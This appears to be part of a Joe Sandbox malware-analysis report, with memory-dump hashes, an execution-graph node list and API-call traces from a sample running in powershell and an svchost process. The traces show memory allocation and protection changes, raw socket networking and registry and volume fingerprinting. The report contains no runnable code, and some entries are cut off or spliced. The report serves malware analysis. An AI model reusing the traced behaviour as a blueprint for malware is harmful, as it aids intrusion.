                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9d3542eaca607e4cb415339dcf360357b10bc51cf6b51d322dc8fa9fa5d4751a
                                                                                    • Instruction ID: 9153995c0736c7fd381420a10b30c2f25c243221e495bd8ee600ab56aba0220b
                                                                                    • Opcode Fuzzy Hash: 9d3542eaca607e4cb415339dcf360357b10bc51cf6b51d322dc8fa9fa5d4751a
                                                                                    • Instruction Fuzzy Hash: A3D13832B0EB990FE7A5976848692787BE1EF52210F1900FED0ACC71E3DE596D45CB41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8d026b40d2d87087da167be85880093af5017bdf0b909f7397f2dae8bfe45c17
                                                                                    • Instruction ID: 40b46ced9e748530f68d27cb2323c01abb5d3e3412b4e1bc6f4b0a5ca07e385e
                                                                                    • Opcode Fuzzy Hash: 8d026b40d2d87087da167be85880093af5017bdf0b909f7397f2dae8bfe45c17
                                                                                    • Instruction Fuzzy Hash: ABC15722B0EA990FEBA5DB6944A85747BE1EF56310F0A00FFC06CC71E3DA59AD05C781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e65669ab5db3408f6bd68dae0369065e8c03c93672b785f8917b8a541f742643
                                                                                    • Instruction ID: d67b47c2733335d9abe3e5cc4f0495c166e243a4887711050be0369fd894e77a
                                                                                    • Opcode Fuzzy Hash: e65669ab5db3408f6bd68dae0369065e8c03c93672b785f8917b8a541f742643
                                                                                    • Instruction Fuzzy Hash: 98B10232B0EA9E0FE7A99768587267536D1EF91310F0A01BED46DC31F3DE59A9018741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1988511120.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9b9e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cdc65bbfb2c214303cb8895bde4124611969da9cbd28137b307c8d99dc491e14
                                                                                    • Instruction ID: b2e1119f93c38896077dd35870018549c625a258493a7afa54e26eafcf283415
                                                                                    • Opcode Fuzzy Hash: cdc65bbfb2c214303cb8895bde4124611969da9cbd28137b307c8d99dc491e14
                                                                                    • Instruction Fuzzy Hash: 1AB1C63061DA4D4FDB68DF28C8957E93BE1FF59310F04426EE84EC72A5CE7499418B82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d8da609fc1feb63eeaf3b6bb5fd02bd6ee8cce6850f0fbc2a3709492df6ec270
                                                                                    • Instruction ID: 2fb77c6c19102483a28d4353934e6ed1b840a208d53a364d9cdca940e0b3a397
                                                                                    • Opcode Fuzzy Hash: d8da609fc1feb63eeaf3b6bb5fd02bd6ee8cce6850f0fbc2a3709492df6ec270
                                                                                    • Instruction Fuzzy Hash: EEA12622A0FBD90FE7A69BA944A81743BE1EF56310F0A00FED46CCB1E3D959AD45C741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1bfaf44c75ebe1db0ec810500fecaee68816e981fc0ee1ddb9be0c27d02066ed
                                                                                    • Instruction ID: 90c64dbd44d8949faa3648d4c726011b93145113b4e9779c57b63085591aa4db
                                                                                    • Opcode Fuzzy Hash: 1bfaf44c75ebe1db0ec810500fecaee68816e981fc0ee1ddb9be0c27d02066ed
                                                                                    • Instruction Fuzzy Hash: 71512632B0EA9D4FEBA2D7A888605A47BE1EF55210F0901FBD06CC70F3DE59AD458741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cae34e42d324d6e68e1999e28630a7cadae0f7294d6de9ecec2bbcd86a88785f
                                                                                    • Instruction ID: 4df1e37a560ce4a414420d2881b6cb454020a4fa885323a7187c9a315d410fcd
                                                                                    • Opcode Fuzzy Hash: cae34e42d324d6e68e1999e28630a7cadae0f7294d6de9ecec2bbcd86a88785f
                                                                                    • Instruction Fuzzy Hash: BB510821B1EA9E4FE7A5976C446113437D1EF66320F0A01FBD45DC71A3DD69ED018781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a33c760b71851908170f53eb4aa498710c5e53692ec00747e473fd10ed4ae403
                                                                                    • Instruction ID: eca7f0b0846bed3a0ba53a24852a3bf2381c25015d0497446ff90bc7510a9660
                                                                                    • Opcode Fuzzy Hash: a33c760b71851908170f53eb4aa498710c5e53692ec00747e473fd10ed4ae403
                                                                                    • Instruction Fuzzy Hash: DD41D336A0EBDD0FEBA6DB6888641647FA1EF56210F0900FBD098CB1F3DD586D498711
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.1989451486.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b0476c0ea4edf95cf173a6b755495bb3a216aedcb91b496acd4a548db0bfa4de
                                                                                    • Instruction ID: 2267147565a4c02919e664b6e696f9467cb0db97f97978f5e035cb3d69c72bc9
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13146ceb6a5eb19e58ddbdb73a4d79a33650897a5efa895a4487401b5cadbbb4
                                                                                    • Instruction ID: 242f892683ad9a1e67dff4fefb4a2ff511a990381df6e146d0c3c63f7a143c2c
                                                                                    • Opcode Fuzzy Hash: 13146ceb6a5eb19e58ddbdb73a4d79a33650897a5efa895a4487401b5cadbbb4
                                                                                    • Instruction Fuzzy Hash: B2F0B775A001059FCB15CB9CD990AEEF7B1FF88324F248159E515A72A1C736A852CB90

                                                                                    Execution Graph

                                                                                    Execution Coverage: 3.2%
                                                                                    Dynamic/Decrypted Code Coverage: 100%
                                                                                    Signature Coverage: 2.1%
                                                                                    Total number of Nodes: 1118
                                                                                    Total number of Limit Nodes: 18
                                                                                    execution_graph (interactive graph of the execution flow; its node and edge list is not reproduced here)
13883->13911 13924 5b620d9 13884->13924 13889 5b64a6e free 13890 5b6448c free 13889->13890 13890->13895 13893 5b6444b 13894 5b6210e 69 API calls 13893->13894 13894->13895 13895->13877 13939 5b62258 malloc 13896->13939 13898 5b62126 13941 5b66594 malloc 13898->13941 13900 5b6214a 13944 5b622bc malloc 13900->13944 13904 5b6a5c7 13903->13904 13905 5b6a5a8 13903->13905 13935 5b6a5d6 13904->13935 13907 5b6a5ad 13905->13907 13928 5b6a6a3 memset 13905->13928 13907->13872 13908 5b6a5c5 13908->13872 13910->13880 13912 5b6421a __cfltcvt 13911->13912 13913 5b64226 memset getaddrinfo 13912->13913 13914 5b642db 13913->13914 13917 5b64263 __cfltcvt 13913->13917 13914->13884 13919 5b61a2b 13914->13919 13915 5b642d2 FreeAddrInfoW 13915->13914 13916 5b6428c 13916->13915 13917->13915 13917->13916 13918 5b642bd htons 13917->13918 13918->13915 13922 5b61a41 __cfltcvt 13919->13922 13920 5b61a7f strchr 13921 5b61a9d strlen 13920->13921 13920->13922 13921->13922 13922->13920 13923 5b61ac7 13922->13923 13923->13884 13923->13893 13925 5b6210a 13924->13925 13926 5b620e9 13924->13926 13925->13889 13926->13925 13927 5b620f6 free 13926->13927 13927->13926 13931 5b6a6cc 13928->13931 13929 5b6a6f3 strchr 13930 5b6a709 strchr 13929->13930 13929->13931 13930->13931 13931->13929 13932 5b6a7f4 13931->13932 13934 5b6a794 __cfltcvt 13931->13934 13933 5b6a5d6 strchr 13932->13933 13932->13934 13933->13934 13934->13908 13936 5b6a5fb 13935->13936 13938 5b6a66f __cfltcvt 13935->13938 13937 5b6a600 strchr 13936->13937 13936->13938 13937->13936 13938->13908 13940 5b62272 13939->13940 13940->13898 13942 5b665a4 memset 13941->13942 13943 5b665c6 13941->13943 13942->13943 13943->13900 13945 5b622cc 13944->13945 13948 5b62303 13945->13948 13953 5b64fc6 13948->13953 13951 5b62180 13951->13863 13952 5b6234d free 13952->13951 13963 5b64f50 malloc 13953->13963 13955 5b64fd7 13956 5b65024 __cfltcvt 13955->13956 13957 5b64fe8 __cfltcvt 13955->13957 13961 5b6231d 13955->13961 13969 5b6be45 13956->13969 13957->13961 
13973 5b6be87 13957->13973 13959 5b6501f 13959->13961 13962 5b6508a 38 API calls 13959->13962 13961->13951 13961->13952 13962->13961 13964 5b64f68 13963->13964 13965 5b64f6f free 13964->13965 13966 5b64f7b 13964->13966 13965->13955 13977 5b64f8b malloc memset 13966->13977 13968 5b64f87 13968->13955 13970 5b6be53 13969->13970 13972 5b6be72 13969->13972 13970->13972 13979 5b6b1b1 13970->13979 13972->13959 13974 5b6be95 13973->13974 13976 5b6beb5 13973->13976 13974->13976 14027 5b6b314 13974->14027 13976->13959 13978 5b64fad 13977->13978 13978->13968 13980 5b6b1d2 13979->13980 13985 5b6b1c9 13979->13985 13981 5b6b1eb 13980->13981 13990 5b6bdce 13980->13990 13983 5b6b21e memset 13981->13983 13981->13985 13994 5b6bf21 13981->13994 13987 5b6b25d 13983->13987 13985->13972 13987->13985 13988 5b6b2af GetLastError 13987->13988 13988->13985 13989 5b6b2bc WSAGetLastError 13988->13989 13989->13985 13991 5b6bdda 13990->13991 13993 5b6bdf5 13990->13993 13991->13993 13997 5b6ab5a 13991->13997 13993->13981 14025 5b6bee9 WSAIoctl 13994->14025 14000 5b6ab70 13997->14000 13999 5b6ab6c 13999->13993 14001 5b6abe7 bind 14000->14001 14002 5b6ab7e socket 14000->14002 14003 5b6abfb WSAGetLastError 14001->14003 14008 5b6ab98 14001->14008 14004 5b6ab92 WSAGetLastError 14002->14004 14005 5b6aba8 SetHandleInformation 14002->14005 14003->14008 14004->14008 14006 5b6abb7 GetLastError 14005->14006 14007 5b6abd1 14005->14007 14009 5b6abc6 14006->14009 14013 5b6ac1b ioctlsocket 14007->14013 14008->13999 14012 5b6abc8 closesocket 14009->14012 14011 5b6abe0 14011->14001 14011->14012 14012->14008 14014 5b6ac57 CreateIoCompletionPort 14013->14014 14015 5b6ac41 WSAGetLastError 14013->14015 14016 5b6ac73 14014->14016 14020 5b6ac79 14014->14020 14022 5b6ac47 14015->14022 14017 5b6acaf GetLastError 14016->14017 14016->14020 14017->14022 14018 5b6aca9 14019 5b6acdc 14018->14019 14021 5b6ad14 setsockopt _errno 14018->14021 14018->14022 14019->14022 14024 5b6ad4b _errno 14019->14024 14020->14018 14023 5b6aca0 
SetFileCompletionNotificationModes 14020->14023 14021->14019 14022->14011 14023->14018 14024->14022 14026 5b6b20e 14025->14026 14026->13983 14026->13985 14028 5b6b335 14027->14028 14037 5b6b32c 14027->14037 14029 5b6b34f 14028->14029 14038 5b6be09 14028->14038 14031 5b6b382 memset 14029->14031 14032 5b6bf21 WSAIoctl 14029->14032 14029->14037 14034 5b6b3c1 14031->14034 14033 5b6b372 14032->14033 14033->14031 14033->14037 14035 5b6b413 GetLastError 14034->14035 14034->14037 14036 5b6b420 WSAGetLastError 14035->14036 14035->14037 14036->14037 14037->13976 14039 5b6be15 14038->14039 14041 5b6be31 14038->14041 14039->14041 14042 5b6ada5 14039->14042 14041->14029 14043 5b6ab70 15 API calls 14042->14043 14044 5b6adb7 14043->14044 14044->14041 12695 5b6a4d6 12696 5b6a4e5 12695->12696 12704 5b6a502 12695->12704 12697 5b6a570 abort 12696->12697 12698 5b6a507 12696->12698 12699 5b6a510 12696->12699 12700 5b6a4fb 12696->12700 12696->12704 12717 5b6cd86 12698->12717 12721 5b6cbd9 12699->12721 12705 5b6bb4c 12700->12705 12706 5b6bb64 12705->12706 12707 5b6bb88 12705->12707 12708 5b6bb77 12706->12708 12709 5b6bb6b shutdown 12706->12709 12710 5b6bb7d 12707->12710 12712 5b6bc89 2 API calls 12707->12712 12725 5b6bc89 12708->12725 12709->12710 12713 5b6bc3b closesocket 12710->12713 12715 5b6bc48 12710->12715 12714 5b6bb9b 12712->12714 12713->12715 12714->12710 12716 5b6bbc4 closesocket 12714->12716 12715->12704 12716->12714 12730 5b6beca 12717->12730 12719 5b6cd91 closesocket 12720 5b6cda2 12719->12720 12720->12704 12722 5b6cbe8 12721->12722 12724 5b6cbed 12721->12724 12732 5b6cbf7 12722->12732 12724->12704 12726 5b6bca1 12725->12726 12727 5b6bccf CancelIo 12726->12727 12728 5b6bcac WSAIoctl 12726->12728 12727->12710 12728->12727 12729 5b6bcca 12728->12729 12729->12710 12731 5b6bed4 12730->12731 12731->12719 12733 5b6cc0b 12732->12733 12734 5b6cc32 12733->12734 12736 5b6cc58 12733->12736 12734->12724 12741 5b6ccc4 12736->12741 12740 5b6cc99 12740->12734 12754 5b69c78 12741->12754 
12744 5b6c391 12745 5b6c3b1 CreateEventA 12744->12745 12747 5b6c3a2 12744->12747 12746 5b6c41a 12745->12746 12745->12747 12746->12740 12748 5b6c3f6 WaitForSingleObject 12747->12748 12749 5b6c422 CloseHandle 12747->12749 12753 5b6c429 12747->12753 12751 5b6c404 GetLastError CloseHandle WSASetLastError 12748->12751 12752 5b6c41f 12748->12752 12749->12753 12750 5b6c445 WSASetLastError 12750->12746 12751->12746 12752->12749 12753->12750 12755 5b69c81 12754->12755 12756 5b69c8b 12754->12756 12758 5b69c8e CreateEventA InterlockedCompareExchange 12755->12758 12756->12744 12759 5b69cba SetEvent 12758->12759 12760 5b69cc9 CloseHandle WaitForSingleObject 12758->12760 12761 5b69cdb 12759->12761 12760->12761 12761->12756 14069 5b6355a 14070 5b63567 14069->14070 14074 5b63574 14069->14074 14071 5b641f6 4 API calls 14070->14071 14073 5b6356e 14071->14073 14072 5b635b7 14073->14074 14075 5b635bc 14073->14075 14074->14072 14076 5b6210e 69 API calls 14074->14076 14078 5b635c6 14075->14078 14076->14072 14083 5b635e4 14078->14083 14079 5b63634 14081 5b6a4d6 19 API calls 14079->14081 14082 5b63653 14079->14082 14080 5b64a6e free 14080->14079 14081->14082 14082->14072 14083->14079 14083->14080

Control-flow Graph

APIs
• memset.MSVCRT ref: 05B6B06C
• memset.MSVCRT ref: 05B6B0B8
• WSARecv.WS2_32(FFE0458D,00000000,00000001,?,00000000,05B628E9,00000000), ref: 05B6B0E6
• GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 05B6B110
• WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 05B6B11D
• WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 05B6B127
• WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 05B6B12F
• RegisterWaitForSingleObject.KERNEL32(05B62909,30C48300,05B6AF9E,05B628D9,000000FF,00000004), ref: 05B6B179
Memory Dump Source
• Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
Similarity
• API ID: ErrorLast$memset$ObjectRecvRegisterSingleWait
• String ID:
• API String ID: 2020750497-0
• Opcode ID: 44410584066b7b378d08e99231bbb2ad98d59eb3135315bb2534645fa2f6e43e
• Instruction ID: 5c86ea3b5c9185a031bedd13ffacdecb9f8b36a8b9f7a3e23dcf393d3397130a
• Opcode Fuzzy Hash: 44410584066b7b378d08e99231bbb2ad98d59eb3135315bb2534645fa2f6e43e
• Instruction Fuzzy Hash: 45419A31620609BFE7219F24CC49BAABBF9FF04314F208669E952DA590D778F615CB90

Control-flow Graph

APIs
• socket.WS2_32(00000010,00000001,00000000), ref: 05B6AB85
• WSAGetLastError.WS2_32(?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010,05B6BDF5,05B6BE72), ref: 05B6AB92
  • Part of subcall function 05B6AC1B: ioctlsocket.WS2_32(05B6BDF5,8004667E,05B6BE72), ref: 05B6AC36
  • Part of subcall function 05B6AC1B: WSAGetLastError.WS2_32(?,?,05B6ABE0,17E80870,05B6BDF5,00000000,00000010,00000000,?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010), ref: 05B6AC41
• SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010,05B6BDF5,05B6BE72), ref: 05B6ABAD
• GetLastError.KERNEL32(?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010,05B6BDF5,05B6BE72), ref: 05B6ABB7
• closesocket.WS2_32(00000000), ref: 05B6ABC9
• bind.WS2_32(50A5A5A5,05B6BDF5,00000002), ref: 05B6ABF0
• WSAGetLastError.WS2_32(?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010,05B6BDF5,05B6BE72), ref: 05B6ABFB
Memory Dump Source
• Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
Similarity
• API ID: ErrorLast$HandleInformationbindclosesocketioctlsocketsocket
• String ID:
• API String ID: 2417539845-0
• Opcode ID: 548ff8c268fde8c1fac98911efbb57134668e6656e1717f94cc667dfee514cd1
• Instruction ID: d4b7c8e7fb58dfb8b40013ffe46996b94edacf07b80f92bdc28eb15e580c526a
• Opcode Fuzzy Hash: 548ff8c268fde8c1fac98911efbb57134668e6656e1717f94cc667dfee514cd1
• Instruction Fuzzy Hash: C7114C35214604ABDF261A74EC0AF7A7FA7FB01730F248659F662A50E0DB75B440DA51

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
Similarity
• API ID: callocfree$memsetstrlen$sprintfsrandtime
• String ID:
• API String ID: 2846687148-0
• Opcode ID: 6fc778670947596458672facb983c792e6dcb3c109d9da9770ef3b3550a21ae5
• Instruction ID: 70f9e3308efad5a4f8a7c33dbe37e84c0a46e7661574922dbcc25597986ec95c
• Opcode Fuzzy Hash: 6fc778670947596458672facb983c792e6dcb3c109d9da9770ef3b3550a21ae5
• Instruction Fuzzy Hash: A5713A74900609AFDB20DF65D885AAEBBF9FF08300F10496EE95A97640D774BA44CB61
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 032C0326
  • Part of subcall function 032C00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 032C00CD
  • Part of subcall function 032C00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032C0279
• VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 032C0378
• VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 032C03E7
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 032C0407
• MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 032C042E
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 032C0456
• CloseHandle.KERNELBASE(?), ref: 032C0471
Strings
Memory Dump Source
• Source File: 0000000B.00000003.2196728803.00000000032C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_3_32c0000_svchost.jbxd
Similarity
• API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
• String ID: ,
• API String ID: 3867569247-3772416878
• Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
• Instruction ID: 276caa0192d064cea6aa1924d413df92dacd0dabf0d9d0b62d370ca76f8227b3
• Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
• Instruction Fuzzy Hash: 4A61FCB5910249EFDB20DFA5C884ADEFBB9FF08354F14C519E959A7240D770E981CB60

Control-flow Graph

APIs
• SetErrorMode.KERNELBASE(00008003), ref: 05B6992F
• WSAStartup.WS2_32(00000202,?), ref: 05B6BF91
  • Part of subcall function 05B6BD3A: memset.MSVCRT ref: 05B6BD4A
  • Part of subcall function 05B6BD3A: htons.WS2_32(00000002), ref: 05B6BD5B
  • Part of subcall function 05B6BD3A: inet_addr.WS2_32(?), ref: 05B6BD68
  • Part of subcall function 05B6BD81: memset.MSVCRT ref: 05B6BD91
  • Part of subcall function 05B6BD81: htons.WS2_32(?), ref: 05B6BDA2
• socket.WS2_32(00000002,00000001,00000000), ref: 05B6BFDE
• getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 05B6C00F
• closesocket.WS2_32(00000000), ref: 05B6C022
• WSAGetLastError.WS2_32 ref: 05B6C02A
• socket.WS2_32(00000017,00000001,00000000), ref: 05B6C03F
• closesocket.WS2_32(00000000), ref: 05B6C074
• WSAGetLastError.WS2_32 ref: 05B6C07C
Memory Dump Source
• Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
Similarity
• API ID: Error$Lastclosesockethtonsmemsetsocket$ModeStartupgetsockoptinet_addr
• String ID:
• API String ID: 2777411211-0
• Opcode ID: db992caeca8362980ff30449d603e235414214f20971b64bef60732cbe8211d5
• Instruction ID: 260d24fa397db34d24ab169feb4af7df70db676e838c11031369abcc48a0a1ed
• Opcode Fuzzy Hash: db992caeca8362980ff30449d603e235414214f20971b64bef60732cbe8211d5
• Instruction Fuzzy Hash: 8531F672204301ABD710BA649C8EF7BBEADFF45710F100559F6569B0C0DBB8B804CB61

Control-flow Graph

APIs
• memset.MSVCRT ref: 05B6B49F
• memset.MSVCRT ref: 05B6B4AB
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,05B650A3,00000000,00000000,05B6505E,00000000), ref: 05B6B4BD
• WSASend.WS2_32(?,05B650A3,?,00000000,00000000,00000010,00000000), ref: 05B6B4E2
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 05B6B53B
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 05B6B548
• RegisterWaitForSingleObject.KERNEL32(00000048,?,05B6B60D,00000000,000000FF,0000000C), ref: 05B6B5D4
Memory Dump Source
• Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
Similarity
• API ID: ErrorLastmemset$CreateEventObjectRegisterSendSingleWait
• String ID:
• API String ID: 2712206520-0
• Opcode ID: eccfe10d65386f0021b2da9b001aa25ff0ce90164e2d6639cbec434883a203e9
• Instruction ID: 79616d07a4310a87fc6a6e1c37638a8b0fe599f3ab139c774f816ee68bf9b1d9
• Opcode Fuzzy Hash: eccfe10d65386f0021b2da9b001aa25ff0ce90164e2d6639cbec434883a203e9
• Instruction Fuzzy Hash: AC5170B0510A0AAFDB24CF25C884AA6FBF9FF04354B00866EE956C7A60D734F855CF90

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 05B64817
                                                                                      • Part of subcall function 05B6327F: GetModuleHandleA.KERNEL32(05B8615C,05B8616C), ref: 05B63291
                                                                                      • Part of subcall function 05B6327F: GetProcAddress.KERNEL32(00000000), ref: 05B63298
                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,05B8635C,00000000,00000001,00000068), ref: 05B6483F
                                                                                    • RegQueryValueExW.KERNELBASE(00000068,05B86344,00000000,00000000,?,00000000), ref: 05B64865
                                                                                    • RegCloseKey.KERNELBASE(00000068), ref: 05B6488B
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 05B6489D
                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05B648C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3011097833.0000000005B61000.00000020.00001000.00020000.00000000.sdmp, Offset: 05B61000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_5b61000_svchost.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCloseCurrentDirectoryHandleInformationModuleOpenProcProcessQuerySystemValueVolume
                                                                                    • String ID:
                                                                                    • API String ID: 3913378182-0
                                                                                    • Opcode ID: 5916d2e36735dbf8f13900d66c0268017bfdce2e67e287dc179b1336d78c87f9
                                                                                    • Instruction ID: cd89cce2f88c2262ed91a4d04efb8f34498eb9d2971b700e704699f02887a82d
                                                                                    • Opcode Fuzzy Hash: 5916d2e36735dbf8f13900d66c0268017bfdce2e67e287dc179b1336d78c87f9
                                                                                    • Instruction Fuzzy Hash: 1C31C0B6A01118BADF21DBA5DD49FEF7BBCEF14255F1004A5F605E2040EA74A784CBA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 179 5b6ac1b-5b6ac3f ioctlsocket 180 5b6ac57-5b6ac71 CreateIoCompletionPort 179->180 181 5b6ac41 WSAGetLastError 179->181 182 5b6ac73-5b6ac77 180->182 183 5b6ac7c-5b6ac86 180->183 184 5b6ac47-5b6ac48 181->184 185 5b6acaf-5b6acb7 GetLastError 182->185 186 5b6ac79 182->186 187 5b6ac8e-5b6ac95 183->187 188 5b6ac88 183->188 189 5b6ac4b-5b6ac52 call 5b6bd00 184->189 185->189 186->183 190 5b6ac97-5b6ac9a 187->190 191 5b6accd-5b6acd1 187->191 188->187 201 5b6acfb-5b6acfe 189->201 190->191 195 5b6ac9c-5b6ac9e 190->195 193 5b6ace3-5b6ace7 191->193 194 5b6acd3-5b6ace1 call 5b6ad14 191->194 198 5b6ad00-5b6ad07 193->198 199 5b6ace9-5b6acf9 call 5b6ad4b 193->199 194->193 194->201 195->191 200 5b6aca0-5b6aca7 SetFileCompletionNotificationModes 195->200 207 5b6ad0d 198->207 208 5b6ad09 198->208 199->198 199->201 204 5b6acb9-5b6acc4 200->204 205 5b6aca9-5b6acad 200->205 206 5b6ad0f-5b6ad13 201->206 204->191 211 5b6acc6-5b6acc8 204->211 205->191 207->206 208->207 211->184
                                                                                    APIs
                                                                                    • ioctlsocket.WS2_32(05B6BDF5,8004667E,05B6BE72), ref: 05B6AC36
                                                                                    • WSAGetLastError.WS2_32(?,?,05B6ABE0,17E80870,05B6BDF5,00000000,00000010,00000000,?,?,?,05B6AB6C,05B6BDF5,00000002,05B6BDF5,00000010), ref: 05B6AC41
                                                                                    • CreateIoCompletionPort.KERNELBASE(05B6BDF5,19751710,05B6BDF5,00000000,?,?,05B6ABE0,17E80870,05B6BDF5,00000000,00000010,00000000,?,?,?,05B6AB6C), ref: 05B6AC61
